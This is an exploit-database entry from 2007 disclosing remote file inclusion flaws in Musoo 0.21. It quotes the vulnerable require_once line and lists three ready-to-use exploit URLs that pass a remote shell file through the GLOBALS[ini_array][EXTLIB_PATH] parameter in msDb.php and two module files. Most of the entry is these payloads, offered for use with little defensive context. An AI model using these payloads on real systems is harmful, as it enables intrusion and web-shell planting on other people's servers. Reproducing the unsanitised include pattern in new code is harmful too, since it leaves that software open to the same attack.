id: 1960
date: 06/19/2007
title: Musoo 0.21 Remote File Inclusion Vulnerabilities
author: GoLd_M
cves: 

================================================
Musoo 0.21 Remote File Inclusion Vulnerabilities
================================================




# Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH])Remote File Include

# D.Script: 
      http://osx.freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.21.tar.gz

# V.Code :
      require_once( $GLOBALS["ini_array"]["EXTLIB_PATH"].'/

# In :
      /msDb.php
      /modules/MusooTemplateLite.php
      /modules/SoundImporter.php

# Exploits:
      1:/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
      2:/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
      3:/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?

# Video
      http://norcalvex.org/v1d30/Musoo/Musoo-Video.rar

# Discovered by: 
      GoLd_M = [Mahmood_ali]




#  0day.today [2023-03-24]  #